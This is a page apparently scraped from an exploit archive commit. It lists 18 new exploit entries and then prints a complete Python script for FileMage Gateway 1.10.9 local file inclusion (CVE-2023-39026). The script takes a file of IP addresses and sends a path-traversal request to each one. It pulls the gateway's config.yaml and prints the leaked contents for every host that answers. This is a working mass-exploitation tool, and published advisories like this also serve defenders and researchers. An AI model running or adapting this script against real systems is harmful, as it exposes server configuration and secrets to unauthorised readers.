4e246a01fb
18 changes to exploits/shellcodes/ghdb
DLINK DPH-400SE - Exposure of Sensitive Information
FileMage Gateway 1.10.9 - Local File Inclusion
Academy LMS 6.1 - Arbitrary File Upload
AdminLTE PiHole 5.18 - Broken Access Control
Blood Donor Management System v1.0 - Stored XSS
Bus Reservation System 1.1 - Multiple-SQLi
Credit Lite 1.5.4 - SQL Injection
CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )
CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')
Hyip Rio 2.1 - Arbitrary File Upload
Member Login Script 3.3 - Client-side desync
SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS
Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Webedition CMS v2.9.8.8 - Stored XSS
Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Webedition CMS v2.9.8.8 - Stored XSS
WP Statistics Plugin 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)
Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow
Kingo ROOT 1.5.8 - Unquoted Service Path
NVClient v5.0 - Stack Buffer Overflow (DoS)
Ivanti Avalanche <v6.4.0.0 - Remote Code Execution
39 lines
No EOL
1.4 KiB
Python
Executable file
39 lines
No EOL
1.4 KiB
Python
Executable file
# Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion
|
|
# Date: 8/22/2023
|
|
# Exploit Author: Bryce "Raindayzz" Harty
|
|
# Vendor Homepage: https://www.filemage.io/
|
|
# Version: Azure Versions < 1.10.9
|
|
# Tested on: All Azure deployments < 1.10.9
|
|
# CVE : CVE-2023-39026
|
|
|
|
# Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
|
|
# Patch from vendor - https://www.filemage.io/docs/updates.html
|
|
|
|
import requests
|
|
import warnings
|
|
warnings.filterwarnings("ignore")
|
|
def worker(url):
|
|
response = requests.get(url, verify=False, timeout=.5)
|
|
return response
|
|
def main():
|
|
listIP = []
|
|
file_path = input("Enter the path to the file containing the IP addresses: ")
|
|
with open(file_path, 'r') as file:
|
|
ip_list = file.read().splitlines()
|
|
searchString = "tls"
|
|
for ip in ip_list:
|
|
url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml"
|
|
try:
|
|
response = worker(url)
|
|
#print(response.text)
|
|
if searchString in response.text:
|
|
print("Vulnerable IP: " + ip)
|
|
print(response.text)
|
|
listIP.append(ip)
|
|
except requests.exceptions.RequestException as e:
|
|
print(f"Error occurred for {ip}: {str(e)}")
|
|
|
|
for x in listIP:
|
|
print(x)
|
|
if __name__ == '__main__':
|
|
main() |